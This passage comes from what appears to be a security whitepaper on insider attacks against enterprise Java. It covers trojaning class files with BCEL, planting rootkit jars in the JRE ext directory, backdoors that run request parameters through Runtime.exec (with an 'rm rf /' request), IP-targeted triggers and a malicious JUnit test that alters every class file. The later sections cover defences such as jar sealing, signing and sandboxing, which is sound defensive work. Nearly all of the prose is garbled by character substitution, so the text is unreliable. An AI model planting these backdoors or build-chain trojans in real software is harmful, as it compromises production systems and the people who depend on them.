ln Lhe example below, a call Lo 8unLlme.aeL8unLlme().exec() ls lnserLed ln Lhe Lro[aned meLhods. 1he
developer makes an lnnocenL looklna call Lo lnsLall Lhe Lro[an. ln Lhls case, Lhe uppv.LoSLrlna() meLhod
ls modlfled. 1he call Lo SvsLem.ouL.prlnLln() wlll call LoSLrlna() and execuLe noLepad.exe".

26 26
// somewhere in the code
...
rainbow( "WEB-INF/classes/Puppy.class", "toString" );
System.out.println( new Puppy() );
...

public static void rainbow( String cfp, String methodName ) throws Exception {
JavaClass clazz = new ClassParser( cfp ).parse();

// find the method
// Method m = clazz.getMethod( Puppy.class.getMethod( method, null ));
Method originalMethod = null;
Method[] methods = clazz.getMethods();
for (int i = 0; i < methods.length; i++) {
if (methodName.equals(methods[i].getName())) {
originalMethod = methods[i]; break;
}
}

// A big thank you to BCEL team and Sun for including the BCELifier in the JDK
// String[] options = { "bin/Exec.class" }; BCELifier._main( options );
ClassGen cg = new ClassGen(clazz);
ConstantPoolGen cpg = cg.getConstantPool();
InstructionFactory _factory = new InstructionFactory( cg, cpg);
MethodGen mg = new MethodGen( originalMethod, cg.getClassName(), cpg );

// create exec instructions
InstructionList exec = new InstructionList();
exec.append(_factory.createInvoke("java.lang.Runtime", "getRuntime",
new ObjectType("java.lang.Runtime"), Type.NO_ARGS, Constants.INVOKESTATIC));
exec.append(new PUSH(cpg, "notepad.exe"));
exec.append(_factory.createInvoke("java.lang.Runtime", "exec",
new ObjectType("java.lang.Process"), new Type[] { Type.STRING },
Constants.INVOKEVIRTUAL));
exec.append(InstructionConstants.POP);

// if it's not already there, insert at the beginning of the method
InstructionList il = mg.getInstructionList();
if ( !il.getInstructions()[0].toString( cpg.getConstantPool() ).contains(
"java/lang/Runtime/getRuntime()" ) ) il.insert(exec);

// replace the old method with the new one
mg.stripAttributes(true);
mg.setMaxStack();
mg.setMaxLocals();
cg.replaceMethod( originalMethod, mg.getMethod() );
il.dispose();
FileOutputStream fos = new FileOutputStream(cfp);
cg.getJavaClass().dump(fos);
fos.close();
}
Trojaning Library )ar Fils
MosL developers slmplv download prebullL [ar flles from an open source pro[ecLs or a commerclal
vendors. 1hls creaLes an opporLunlLv for mallclous developers Lo dellver Lhelr aLLack ln Lhe complled
verslon wlLhouL leavlna Lraces ln source code.

27 27
Cne slmple wav Lo do Lhls ls durlna Lhe bulld process. 1he person charaed wlLh creaLlna Lhe dellverable
[ar flle slmplv sLarLs wlLh Lhe code ln Lhe reposlLorv, adds mallclous code, compleLes Lhe bulld, and posLs
Lhe code. 1he bulld scrlpL or someLhlna lnvoked durlna Lhe bulld mlahL be modlfled Lo perform Lhese
sLeps auLomaLlcallv.
An lnslder ln vour oraanlzaLlon could also perform Lhls aLLack bv modlfvlna a llbrarv class flle afLer lL has
been downloaded and before lL ls lncluded ln vour appllcaLlon. lf Lhe source code for Lhe llbrarv ls
avallable, Lhen Lhe aLLacker can [usL make chanaes, recomplle, and replace lL ln Lhe [ar flle. Seallna and
slanlna [ar flles can prevenL Lhls sorL of Lamperlna, buL Lhev are verv lnfrequenLlv used.
lf source code ls noL avallable, Lhen Lhe aLLacker can use a Lool llke '[ad' Lo reverse enalneer Lhe class flle
and Lhen edlL Lhe source code.
Trojaning )ava Runtim )ar Fils
An aLLacker could lnclude code ln Lhelr appllcaLlon LhaL wlll modlfv a plaLform [ar flle Lo lnclude an
aLLack. 1he [ar flles are easv Lo flnd vla Lhe classpaLh. 1hen Lhe aLLacker can use Lhe Apache bvLecode
edlLlna llbrarv 8CLL whlch ls convenlenLlv lncluded ln Lhe !ava runLlme Lo modlfv and replace one of Lhe
svsLem classes ln place.
String[] jars = System.getProperty("java.class.path" ).split(";");
for ( int i=0; i < jars.length; i++ ) if ( jars[i].endsWith( ".jar" ) ) {
// Trojan it
}

uslna 8CLL on a [ar flle ls qulLe easv, as lL supporLs readlna classes from a [ar flle naLlvelv. 1hls allows Lhe
aLLacker Lo open a [ar flle and search ouL a parLlcular class Lo parse. 1he aLLacker mlahL wrlLe Lhe
modlfled class ouL Lo a dlrecLorv on Lhe classpaLh. Modlfvlna [ar flles ln place Lakes a blL more work, buL
ls posslble. [11]
// BCEL example of trojaning a class file in a Jar file
JavaClass clazz = new ClassParser( "C:/Java/jdk15/jre/lib/rt.jar",
"java/lang/String.class").parse();
...more code to modify String.class and replace in jar file
Trojaning )ava Installation
An aLLacker mlahL also Lrv Lo modlfv someLhlna ln Lhe !ava runLlme envlronmenL. An aLLacker could
replace a blnarv, buL modlfvlna a class flle mlahL be more dlfflculL Lo deLecL. Cn Wlndows, Lhls Lvpe of
aLLack falls lf Lhe !ava runLlme ls lnsLalled ln Lhe roaram llles dlrecLorv. ALLempLs Lo wrlLe Lo flles ln Lhls

28 28
dlrecLorv appear Lo work buL are noL acLuallv commlLLed Lo Lhe fllesvsLem. lf Lhe !ava runLlme ls
lnsLalled elsewhere, Lhls proLecLlon does noL applv.
<%@page import="java.io.*"%>
<html>
<body>
<%
byte[] code = request.getParameter("x").getBytes();
new FileWriter(new File("C:/Java/jdk15/jre/lib/jce.jar")).write( bytes );
%>
</body>
</html>

Cne slmple Lechnlque ls Lo wrlLe a new [ar flle Lo Lhe exL" dlrecLorv ln Lhe !ava runLlme envlronmenL.
1hls Lechnlque ls, lncldenLallv, used bv Apple Lo shove Lhe C1[ava.zlp flle onLo evervone's classpaLh. !ar
flles added Lo Lhls dlrecLorv are auLomaLlcallv added Lo Lhe classpaLh of all proarams execuLed bv LhaL
vlrLual machlne. Lven lf vou enable Lhe SecurlLvManaaer, don'L foraeL LhaL sLandard exLenslons aeL
Allermlsslon bv defaulL ln Lhe [re/llb/securlLv/[ava.pollcv flle.
grant codeBase "file:${{java.ext.dirs}}/*" {
permission java.security.AllPermission;
};

1hls Lechnlque can help an aLLacker Lo aeL a permanenL rooLklL onLo Lhe classpaLh ln a wav LhaL ls verv
dlfflculL Lo deLecL. All Lhe mallclous looklna code can be lsolaLed ln Lhe [ar flle LhaL ls verv unllkelv for
anvone Lo ever noLlce or examlne. 1he code Lo lnvoke Lhe rooLklL can look qulLe lnnocuous.

29 29
// Step 0: Create a rootkit class and get the bytecode as a string
public class Kitty {
static {
try {
Runtime.getRuntime().exec("notepad");
}
}

// Step 1: Put innocent looking writeJar() in some utility class somewhere
public static void writeJar( byte[] b, String cn, String jp ) throws Exception {
CRC32 crc32 = new CRC32();
crc32.update(b, 0, b.length);
String shortName = className.substring(0,cn.indexOf(".class"));
Manifest mf = new Manifest();
mf.getMainAttributes().putValue("Manifest-Version", "1.0");
mf.getMainAttributes().putValue("Main-Class", shortName);
JarOutputStream jarout = new JarOutputStream(new FileOutputStream(jp), mf);
JarEntry jarEntry = new JarEntry(className);
jarEntry.setSize(b.length);
jarEntry.setTime(System.currentTimeMillis());
jarEntry.setCrc(crc32.getValue());
jarout.putNextEntry(jarEntry);
jarout.write(bytes, 0, b.length);
jarout.closeEntry();
jarout.flush();
jarout.finish();
}

// Step 2: Use innocent looking writeJar() to stash code in jre/lib/ext directory
public void doGet(HttpServletRequest req, HttpServletResponse resp) {
byte[] b = new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("x"));
writeJar( b,"Exec.class","C:/AspectClass/Standard/jdk15/jre/lib/ext/Kitty.jar");
}

// Step 3: invoke RootKit no source for Kitty anywhere
new Kitty();
Targting Particular Entrpriss
8ememberlna our assumpLlon of no SecurlLvManaaer, Lhere are essenLlallv no llmlLs Lo whaL Lhe aLLack
burled ln Lhe llbrarv can do. All of Lhe aLLack Lechnlques dlscussed above for lnslders wlll work. 1o help
mlnlmlze Lhe llkellhood of Lhe aLLack belna deLecLed, aLLackers mav LaraeL lndlvldual oraanlzaLlons wlLh
code LhaL onlv runs on Lhelr neLwork. ln facL, Lhe mallclous code mav be conflaured Lo onlv run ln
producLlon and noL ln developmenL.
1he example below demonsLraLes llmlLlna Lhe aLLack Lo cerLaln l address ranaes.

30 30
if ( InetAddress.getLocalHost().getHostAddress().startsWith( "64.14.153." ) ) {
// attack
}

Cr, Lo resLrlcL Lhe aLLack Lo lnLraneL appllcaLlons, Lhe aLLacker mlahL resLrlcL Lhe aLLack Lo appllcaLlons
LhaL are runnlna on 8lC 1918 addresses.
if ( InetAddress.getLocalHost().getAddress()[0] == 10 ) {
// attack
// TODO: also check for 192.168.*
}
. Trojaning tb Entrpris Build Srvr
ln a areaL paper enLlLled 8eflecLlons on 1rusLlna 1rusL" [13], ken 1hompson shows [usL how easv lL ls Lo
abuse Lhe chaln of Lools LhaL produce sofLware. Pe Lells how he backdoored Lhe unlx loaln proaram,
Lhen hld Lhe aLLack ln Lhe compller, and Lhen hld Lhe compller aLLack ln lLself. Pls aLLack was noL presenL
ln Lhe source code, onlv ln Lhe blnarles produced bv hls Lro[aned Lool chaln.
Modern sofLware bulld envlronmenLs are Lremendouslv complex. ln Lhe old davs, Lhe onlv Lools anvone
needed were a compller and perhaps a llnker [14]. 1odav, Lhere are enLlre bulld svsLems LhaL provlde
auLomaLlc reLrleval from source code manaaemenL svsLems, auLomaLed bullds, dependencv resoluLlon,
plualn execuLlon, sLaLlc analvsls, LesL sulLe execuLlon, code coveraae analvsls, conLlnuous lnLearaLlon,
meLrlcs dashboards, and more. A common Lool-chaln ls bullL uslna open source Lools such as Subverslon,
Maven, Pudson, nexus, and Sonar [13].
1he sofLware used ln Lhls common Lool chaln ls comprlsed of a larae number of modules, componenLs,
Lools, frameworks, and oLher Lvpes of open source sofLware pro[ecLs. 1hese open source pro[ecLs are
lncluded lnLo Lhe Lool chaln as [ar flles LhaL are loaded and execuLed. 1here are over 100 unlque open
source pro[ecLs lncluded ln Lhe Lool chaln and probablv Lhousands of developers. LsLlmaLed counLs for
Lhe varlous Lools are below, alLhouah Lhere are slanlflcanL overlaps beLween Lhe Lools.
Pudson core: 103 open source pro[ecLs
Pudson dependencles: ~30 open source pro[ecLs
Maven core: ~13 open source pro[ecLs
nexus core: 86 open source pro[ecLs
Subverslon: ~3 open source pro[ecLs
Sonar: ~100 open source pro[ecLs
A rouah counL of Lhe code lnvolved ln Lhe 303 !A8 flles needed Lo run Maven, Pudson, and nexus
revealed over 16 mllllon llnes of code drlvlna Lhls Lool chaln. LxacL dupllcaLes were removed from Lhe
counL, buL Lhese numbers sLlll lnclude several verslons of manv !A8 flles.

31 31
1here ls a rlsk LhaL mallclous code ln Lhls Lool chaln could modlfv producLlon code and undermlne Lhe
securlLv of Lhe producLlon envlronmenL. ln Lhe worsL case, an aLLacker would become a commlLLer on
one of Lhe open source pro[ecLs LhaL feeds Lhls Lool chaln. 1hev would lnserL code lnLo Lhe pro[ecL LhaL,
when run, would modlfv Lhe sofLware belna bullL. Anv flaw ln Lhe Lool chaln could resulL ln a compleLe
compromlse of operaLlonal securlLv, and lL would be verv dlfflculL Lo deLecL.
1here are alreadv serlous securlLv vulnerablllLles ln Lhls Lool chaln. A cursorv revlew of Lhe Pudson web
appllcaLlon revealed numerous xSS and CS8l lssues LhaL have been reporLed Lo Lhe pro[ecL. 1he mosL
serlous of Lhese lnvolves a foraed requesL Lo an admlnlsLraLlve funcLlonallLv LhaL allows arblLrarv !ava
code, lncludlna calls Lo 8unLlme.exec(), Lo be senL Lo Lhe server where lL ls execuLed on behalf of Lhe
admlnlsLraLor. AlLhouah Lhev appear Lo be lnadverLenL, Lhere ls no wav Lo know wheLher Lhese holes are
lnLenLlonal or noL.
A mallclous aLLacker could modlfv Lhe bvLecode for Lhe sofLware ln a wav LhaL would allow remoLe
access. lor example, Lhe aLLacker could lnserL a new meLhod Lo overrlde doCpLlons() or do1race() ln anv
class exLendlna PLLpServleL. Cr Lhe aLLacker could lnserL an exLra llne of code lnLo an exlsLlna meLhod,
such as doCeL() or doosL(). Cnce Lhe Lool-chaln ls subverLed, Lhere are counLless posslblllLles for a
mallclous aLLacker and Lhev are noL complex.
public void doOptions(HttpServletRequest req, HttpServletResponse resp) {
...
Runtime.getRuntime().exec( req.getParameter( "attack" ) );
...
}

OPTIONS http://www.example.com/servlet?attack="rm rf /" HTTP/1.0

An ouLslder could easllv LaraeL Lhe open source Lools used ln Lhe Lool chaln wlLhln manv oraanlzaLlons.
Lcllpse ls wldelv used and has hundreds of open source plualns LhaL are also wldelv used. ln manv
oraanlzaLlons, Lcllpse drlves Lhe bulld process and has Lhe opporLunlLv Lo subverL anvLhlna bullL. 1he
aLLacker would slmplv have Lo choose a popular plualn pro[ecL where becomlna a commlLLer ls Lhe
easlesL.
Abusing Build Tasks
MosL lnLernal developers would noL have dlrecL access Lo Lhe Lool chaln. 1herefore, Lhev would have Lo
flaure ouL a wav Lo use Lhe powerful Lools Lhere Lo subverL Lhe producLlon code. uevelopers can do Lhls
bv addlna sLeps Lo Lhe bulld scrlpL for Lhelr pro[ecL. ln an AnL bulld.xml flle, developers can wrlLe
exLremelv powerful Lasks and aeL Lhem Lo execuLe on Lhe bulld server. 1hev can deleLe flles, overwrlLe
flles wlLh updaLed verslons, execuLe arblLrarv code, and more.
ln Lhe example below, Lhe aLLack has creaLed a slmple Lask LhaL execuLes a !ava proaram. ln Lhls case,
Lhe proaram Lo lnserL lnsLrucLlons lnLo Lhe bvLecode of !ava classes LhaL we dlscussed above. 1he

32 32
developer has placed a [ar flle ln Lhelr home dlrecLorv on Lhe server, and seLs Lhe classpaLh Lo lnclude
LhaL dlrecLorv ln Lhls Lask. 1he proaram ls seL Lo Lro[an Lhe deleLeAccounL.LoSLrlna() meLhod when lL
runs.
<java
classname="Bcel"
dir="${build.dir}"
fork="true"
failonerror="true"
maxmemory="128m">
<arg value="bin/deleteAccount.class toString"/>
<classpath>
<pathelement location="/usr/home/bobama/bcel.jar"/>
<pathelement path="${java.class.path}"/>
</classpath>
</java>

1hls ls [usL a slnale example ln a parLlcular bulld svsLem. All Lhe varlous bulld scrlpL lanauaaes and
envlronmenLs supporL Lhls Lvpe of aLLack, whlch means LhaL Lhese svsLems should recelve much beLLer
scruLlnv Lhan Lhev do now.
Abusing Tst Cass
Anv opporLunlLv for a developer Lo run code on Lhe bulld server ls an opporLunlLv for Lhem Lo
undermlne Lhe bulld. robablv Lhe easlesL wav for a mallclous developer Lo subverL Lhe bulld svsLem ls
Lo creaLe a mallclous LesL case LhaL runs durlna each bulld. 1esL cases are slmplv !ava code and Lhere are
no llmlLs on whaL a mallclous LesL case can access. 1esL code ls aenerallv compleLelv unrevlewed, as lL ls
noL usuallv consldered securlLv crlLlcal.
ln mosL bulld svsLems, LesL code can do anvLhlna lL wanLs Lo Lhe bulld server. 1he LesL cases are run rlahL
afLer Lhe code ls complled and bullL lnLo [ar or war flles. 1he mallclous LesL case could open Lhese flles
and modlfv class flles as dlscussed above. ln addlLlon, Lhe mallclous LesL case could modlfv anv lnLearlLv
checks, such as Mu3 slanaLures, Lo maLch Lhe Lro[aned sofLware.
ln facL, Lhe mallclous code could modlfv Lhe bulld chaln lLself, such LhaL all fuLure bullds would be
compromlsed. 1o cover Lhelr Lracks, Lhe developer could deleLe Lhe LesL code afLer lL had had a chance
Lo run. WlLh conLlnuous lnLearaLlon, Lhls could occur wlLhln a maLLer of mlnuLes afLer Lhe mallclous LesL
case ls commlLLed lnLo Lhe conflauraLlon manaaemenL svsLem.
ln Lhe example below, Lhe enLlre flle svsLem ls searched for anv flles endlna ln .class". lf Lhev are found,
Lhe LoSLrlna() meLhod ls Lro[aned wlLh a call Lo 8unLlme.exec() as demonsLraLed earller.

33 33
import junit.framework.TestCase;

public class JUnit extends TestCase {

@org.junit.Test
void testTrojanJava() {
trojan( new File( "/" ) );
}

public static void trojan(File file) {
if (file.isDirectory() ) {
for (File f : file.listFiles()) {
trojan(f);
}
} else {
if ( file.getName().endsWith( ".class" ) ) {
Bcel.trojan(file.getPath(), "toString");
}
}
}
}

8ulldlna on Lhe examples dlscussed prevlouslv for !ava, Lhe bulld server ls easv Lo Lro[an permanenLlv.
1hls lnsLalls a mallclous [ar lnLo Lhe exL dlrecLorv, buL lL could also replace Lhe [ar flles of Lhe bulld server.
@org.junit.Test
void testTrojanHudson() {
String testData = "yv66vgAAADIAIAcAAgEAB..."
byte[] b = new sun.misc.BASE64Decoder().decodeBuffer(testData);
writeJar( b,"Exec.class","C:/AspectClass/Standard/jdk15/jre/lib/ext/Kitty.jar");
}
Abusing Dpndncy Rsolution
A recenL developmenL ln Lhe world of sofLware bullds ls Lhe use of auLomaLlc dependencv resoluLlon.
LssenLlallv, modern bulld scrlpLs feLch Lhe llbrarles Lhev need durlna Lhe bulld process. WhaL's more, anv
dependencles for Lhose llbrarles are also downloaded. 1he lmaae below shows a Llnv plece of Lhe
dependencles ln Lhe publlc Maven reposlLorles.

34 34

Whlle Lhls process ls exLremelv useful, lL also opens Lhe door for abuse. 1he quesLlon of who conLrols
Lhe reposlLorv ls crlLlcal Lo Lhe securlLv of Lhe producLlon sofLware. An aLLacker mlahL aLLempL Lo add a
mallclous dependencv Lo a plece of sofLware Lo force lL Lo be added Lo Lhe producLlon basellne. 1hls
works even lf Lhere ls no acLual sofLware dependencv on Lhe mallclous llbrarv.
7. Kping Malicious )ava Uut of Your Portfolio
Mallclous code ls easv for lnslders Lo lnserL, dlfflculL Lo deLecL, and verv damaalna. Anv reasonable
evaluaLlon of Lhe rlsk has Lo rank Lhls as falrlv crlLlcal. 8uL addresslna Lhe problem seems lnconslsLenL
wlLh our currenL sofLware developmenL pracLlces. So whaL can we do Lo mlnlmlze Lhls rlsk?
Cnral Stratgis for Protcting Against Insidrs
Cf course, Lhls problem ls much, much older Lhan compuLers. And Lhe soluLlons haven'L chanaed much
LhrouahouL hlsLorv, elLher. 8ruce Schneler [16] has ldenLlfled flve baslc Lechnlques Lo mlnlmlze Lhe rlsk
assoclaLed wlLh mallclous lnslders:
1. LlmlL Lhe number of LrusLed people.
2. Lnsure LhaL LrusLed people are also LrusLworLhv.
3. LlmlL Lhe amounL of LrusL each person has.
4. Clve people overlapplna spheres of LrusL.
3. ueLecL breaches of LrusL afLer Lhe facL and prosecuLe Lhe aullLv.

33 33
1hese are reasonable prlnclples, and we need Lo lnLerpreL Lhem for Lhe sofLware developmenL world. ln
essence, we need Lo do a LhreaL model on Lhe buslness of produclna sofLware and Lhen deslan securlLv
conLrols LhaL wlll deLecL, deLer, or ellmlnaLe Lhe rlsks lnherenL ln Lhe process.
Limiting tb Numbr of Trustd Dvloprs
8emember LhaL everv developer LhaL has ever worked on code LhaL vou LrusL wlLhln vour enLerprlse ls
an lnslder.
Conslder Lhe number of developers LhaL conLrlbuLe Lo Lhe Pudson pro[ecL descrlbed above. Across Lhe
hundreds of open source pro[ecLs Lhere could be Lhousands. As Lhe number of people lncreases, so does
Lhe llkellhood of havlna one who ls mallclous.
keeplna Lhe number of developers under conLrol seems llke a aood ldea. ?ears of code revlews have
demonsLraLed LhaL Lhe Lvpe and frequencv of securlLv vulnerablllLles are falrlv consLanL across secLors,
lanauaaes, processes, and counLrles. So nobodv should conclude LhaL Lhls ls an lndlcLmenL of
ouLsourclna [2,3]. Cn one hand, a weak connecLlon beLween sofLware developer and buver would seem
Lo make mallclous code more llkelv. Powever, a dlsarunLled lnslder mav have more moLlve Lo aLLack.
Ensuring tbat Dvloprs Ar Trustwortby
- 8ackaround checks
- 8ondlna?
- Craduallv earn Lhe rlahL Lo work on crlLlcal code, manaaed wlLh securlLv pollcv
- LsLabllsh accounLablllLv and make sure evervone knows vou're waLchlna
Limiting Trust in Your Coding Procss
1he Llme has come Lo show some resLralnL ln whaL sofLware we LrusL. MosL enLerprlse plaLforms,
frameworks, and appllcaLlons lnclude a falrlv rldlculous amounL of llbrarles. We are LrusLlna our
enLerprlses Lo all of Lhls code. 8efore addlna a new llbrarv Lo an appllcaLlon, we should conslder Lhe rlsk
of addlna LhaL much more code LhaL we have Lo LrusL.
We should also be sLrlcLer ln deflnlna Lhe Als LhaL people are allowed Lo use. LnLerprlses should Lake a
lesson from Lhe Cooale AppLnalne, a cloud compuLlna envlronmenL. ln Lhe cloud, mallclous code could
poLenLlallv access oLher appllcaLlons and Lhe daLa from oLher enLerprlses. So raLher Lhan offer Lhe enLlre
!ava and !ava LL Al, Lhev provlde a llmlLed Al LhaL Lhev call Lhe !8L Class WhlLellsL." [17] 1hls ls
exacLlv Lhe rlahL approach, as lL Lakes a poslLlve approach Lo Lhe problem. AlLhouah Lhelr whlLellsL sLlll
lncludes some danaerous Als, such as reflecLlon and classloadlna, lL would noL be a bad ldea Lo use as a
sLarLlna polnL ln mosL enLerprlses.

36 36
Limiting Trust in Your Build Procss
lf an aLLacker can aeL mallclous code lnLo vour bulld process, Lhev can own all of vour producLlon
sofLware. 1he flrsL sLep ls Lo esLabllsh a Lool-chaln LhaL vou're wllllna Lo LrusL vour enLerprlse Lo. keep
Lhe slze and pedlaree of Lhe sofLware ln mlnd when vou selecL Lools.
lf Lhe aLLracLlon of fancv bulld processes wlLh conLlnuous lnLearaLlon, meLrlcs, LesLs, and oLher plualns ls
Loo areaL, conslder seLLlna up a second LrusLed" bulld process wlLh an absoluLe mlnlmum number of
Lools, perhaps [usL [avac and [ar. 8v comparlna Lhe ouLpuL of Lhe fancv process wlLh Lhe LrusLed process,
vou mav be able Lo deLecL aLLempLs Lo Lro[an class flles.
lor llbrarles LhaL vou can obLaln source code for, don'L use Lhe [ar flle dlsLrlbuLed bv Lhe pro[ecL. lf a
mallclous developer on Lhe pro[ecL has Lro[aned Lhe [ar flle, even checklna Lhe Mu3 hash won'L provlde
anv proLecLlon. lnsLead, conslder arabblna Lhe source and bulldlna Lhe [ar vourself wlLh vour own Lools.
SeL up vour own reposlLorv Lo keep aood coples of llbrarles vou are relvlna on. uon'L slmplv LrusL vour
buslness Lo whaL vou aeL from a publlc reposlLorv.
Cnce vou've bullL [ar flles LhaL vou can LrusL, use Lhe seallna" and slanlna" feaLures avallable ln !ava Lo
proLecL Lhem from modlflcaLlon and mlsuse. Seallna [ar flles ls a slmple chanae Lo Lhe manlfesL and lL
means LhaL all classes deflned ln LhaL packaae musL be archlved ln Lhe same !A8 flle. 1hls prevenLs
developers from addlna classes ln Lhe same packaae Lo Lhe classpaLh LhaL overrlde or exLend vour code.
Slanlna [ar flles allows vou Lo aranL prlvlleaes based on Lhe slaner of Lhe codebase. lor example, vou can
aranL Lhe permlsslon Lo make daLabase connecLlons onlv Lo code LhaL ls slaned bv vou.
Limiting Trust in Your Uprational Procss
1he !ava SecurlLvManaaer, commonlv known as Lhe sandbox" was deslaned Lo allow people Lo run !ava
appleL code ln Lhelr browser LhaL Lhev dld noL wrlLe. Compare Lhls wlLh whaL enLerprlses are dolna on
Lhe server slde: runnlna unLrusLed code ln a senslLlve envlronmenL. 1he problem ls exacLlv Lhe same and
Lhe sandbox soluLlon ls Lhe besL answer we have. 1he sandbox ls lncredlblv useful when vou are runnlna
!ava code ln a web conLalner LhaL vou dld noL wrlLe.
1odav's SecurlLvManaaer requlres permlsslons Lo access manv of Lhe !ava calls LhaL can be used Lo
lmplemenL mallclous code. 1he sandbox can make lL slanlflcanLlv more dlfflculL for aLLackers Lo use
manv of Lhe Lechnlques descrlbed ln Lhls paper. ln facL, enabllna Lhe sandbox on vour bulld server wlll
help Lo prevenL aLLacks Lhere as well.
All of Lhe ma[or servleL conLalners, lncludlna Websphere, Webloalc, 1omcaL, and Classflsh, supporL Lhe
use of a SecurlLvManaaer. unforLunaLelv, lL ls dlsabled bv defaulL ln all of Lhem. [3,6,7,8]. 1helr producL
documenLaLlon does noL encouraae Lhe use of Lhe sandbox. ln falrness, enabllna Lhe sandbox on mosL
appllcaLlons ls dlfflculL because Lhev were noL wrlLLen wlLh llmlLed permlsslons ln mlnd.

37 37
8emember, Lhe sandbox doesn'L proLecL aaalnsL evervLhlna. lL can onlv proLecL aaalnsL cerLaln uses of
llbrarles and varlous danaerous calls. 1here are loLs of aLLacks LhaL an enLerprlse developer could
perform LhaL do noL make a requesL of Lhe SecurlLvManaaer.
8evond Lhe sandbox, vou should check Lhe classpaLh for vour appllcaLlon and prlnL ouL all Lhe [ars and
dlrecLorles llsLed Lhere. All Lhe [ars and classes Lhere should be requlred for vour appllcaLlon, and should
be sealed and slaned as menLloned above.
Cne lasL Llp for llmlLlna Lhe LrusL ln Lhe operaLlonal envlronmenL. uon'L run wlLh a full !uk lncludlna Lhe
compller. As we saw above, Lhe compller Al ls qulLe powerful, and alves developers Lhe freedom Lo
wrlLe code aL runLlme. A beLLer approach ls Lo run wlLh onlv a !8L ln producLlon. 1he downslde ls LhaL
vou'll have Lo use [spc Lo precomplle vour [sps.
Establisbing Uvrlapping Spbrs of Trust
Schneler noLes LhaL movle LheaLers have one person selllna LlckeLs and anoLher onlv a few vards awav
rlpplna Lhem ln half. 1he reason for Lhls ls LhaL lL's more dlfflculL for one person Lo defraud Lhe LheaLer.
1hls ls Lhe Lvpe of Lhlnklna LhaL we should applv Lo securlna Lhe sofLware developmenL process.
1he use of peer code revlew" ls a lona sLandlna pracLlce ln manv sLrona sofLware developmenL
oraanlzaLlons. Whlle Lhese meeLlnas Lend Lo focus on non-securlLv relaLed concerns, Lhev also make lL
conslderablv less llkelv for an aLLacker Lo aLLempL Lo sneak ln mallclous code. 1ralnlna Lhe peer
revlewers Lo look for mallclous code mav also help.
1he Aalle pracLlce of palr proarammlna" ls also llkelv Lo be a deLerrenL Lo mallclous code. Pavlna Lwo
developers lnLlmaLelv famlllar wlLh Lhe same code makes mallclous code easler Lo deLecL. Aalle's LesL-
drlven developmenL mav also help lf securlLv LesLs are lncluded ln Lhe LesL sulLe.
lor crlLlcal pro[ecLs, lL mlahL even be posslble Lo sLrucLure Lhe sofLware ln a wav LhaL anv Lrulv
devasLaLlna aLLack would requlre access Lo more Lhan one parL. 1hls ls somewhaL slmllar Lo llke Lhe
aovernmenL's comparLmenLed pro[ecLs. 8v resLrlcLlna developers Lo onlv one parL of Lhe sofLware,
mallclous code aLLacks are more dlfflculL.
Dtcting Malicious Cod
8ecause proarammers make a loL of lnadverLenL mlsLakes, we never reallv know lf a vulnerablllLv ls
mallclous or [usL an accldenL. Lven followlna Lhe suaaesLlons above, lL ls qulLe llkelv LhaL numerous
vulnerablllLles wlll end up ln our sofLware. 1hls makes deLecLlon of vulnerablllLles and breaches crlLlcallv
lmporLanL, as lL ls Lhe lasL llne of defense aaalnsL poLenLlallv devasLaLlna aLLacks.
We should sLarL bv esLabllshlna sLrona accounLablllLv for all Lhe code we use. lor lnLernallv developed
code, Lhls lnvolves source code conLrol svsLems LhaL auLhenLlcaLe and keep a record of all chanaes. lor

38 38
llbrarles and Lools, we should aeL an offlclal bulld, creaLe lnLearlLv checks, perform securlLv LesLlna, and
monlLor Lhe lnLearlLv seals.
We should also carefullv valldaLe Lhe securlLv of our own code. A proaram Lo ldenLlfv mallclous code
looks slmllar Lo ordlnarv appllcaLlon securlLv proarams. 8uL Lhe process should be enhanced Lo seek !ava
enLerprlse rooLklLs as well as slmple vulnerablllLles. 1hls ls an area LhaL needs addlLlonal research.
Cne area of research ls Lo ensure LhaL LhaL !ava code ls checked for Lrlckv escaplna as dlscussed above.
Applvlna a code formaLLer mav help Lo make manual code revlew more effecLlve. We also need Lo
research beLLer sLaLlc analvsls rules LhaL asslsL human revlewers bv flaaalna posslble mallclous code. 1he
examples covered ln Lhls paper barelv scraLch Lhe surface of Lhe wavs Lo mlsuse Lhe powerful Als
avallable ln Lhe Lvplcal enLerprlse !ava envlronmenL.
About Aspct Scurity
AspecL SecurlLv ls Lhe leadlna provlder of appllcaLlon securlLv assurance servlces and Lralnlna. Mllllons of
llnes of crlLlcal appllcaLlon code are verlfled each monLh bv AspecL's experlenced peneLraLlon LesLlna
and code revlew speclallsLs. AspecL Leaches advanced hands-on securlLv courses Lo Lhousands of
archlLecLs, developers, and manaaers each vear. Manv oraanlzaLlons wlLh crlLlcal appllcaLlons have
reaalned appllcaLlon securlLv conLrol bv lmplemenLlna AspecL's CaLalvsL proaram. AspecL ls
headquarLered ln Columbla Mu. lor lnformaLlon, vlslL www.aspecLsecurlLv.com or call 301-604-4882.
About tb Autbor
!eff Wllllams ls Lhe CLC and a founder of AspecL SecurlLv, speclallzlna excluslvelv ln appllcaLlon securlLv
professlonal servlces. !eff also serves as Lhe volunLeer Chalr of Lhe Cpen Web AppllcaLlon SecurlLv
ro[ecL (CWAS). !eff has made exLenslve conLrlbuLlons Lo Lhe appllcaLlon securlLv communlLv Lhrouah
CWAS, lncludlna wrlLlna Lhe 1op 1en, WebCoaL, Secure SofLware ConLracL Annex, LnLerprlse SecurlLv
Al, CWAS 8lsk 8aLlna MeLhodoloav, Lhe xSS revenLlon CheaL SheeL, and sLarLlna Lhe worldwlde local
chapLers proaram. !eff has been wrlLlna code for 23 vears from malnframe Lo cloud and has now
dedlcaLed hls llfe Lo aeLLlna Lhe sofLware markeL Lo make raLlonal declslons abouL securlLv rlsks. !eff has
dearees ln compuLer sclence and psvcholoav, and wasLed a Lon of Llme and monev on a law dearee from
CeoraeLown.
Rfrncs
[1] - Ld ?ourdon, 8vLe Wars, Lhe lmpacL of SepLember 11 on l1," ?ourdon ress, renLlce Pall, 2002
hLLp://www.vourdon.com/?loc=abouLme
[2] - !ames A. Lewls, lorelan lnfluence on SofLware: 8lsks and 8ecourse," March 2007.
hLLp://www.csls.ora/publlcaLlon/forelan-lnfluence-sofLware

39 39
[3] - McPenrv, Wllllam k. and Carmel, Lrran (2008) oLenLlal 1hreaLs of Cffshorlna SofLware 8&u,"
!ournal of Pomeland SecurlLv and Lmeraencv ManaaemenL: vol. 3: lssue 1, ArLlcle 6.
hLLp://www.bepress.com/[hsem/vol3/lss1/6
[4] - CWAS LnLerprlse SecurlLv Al, 2009
hLLp://www.owasp.ora/lndex.php/LSAl
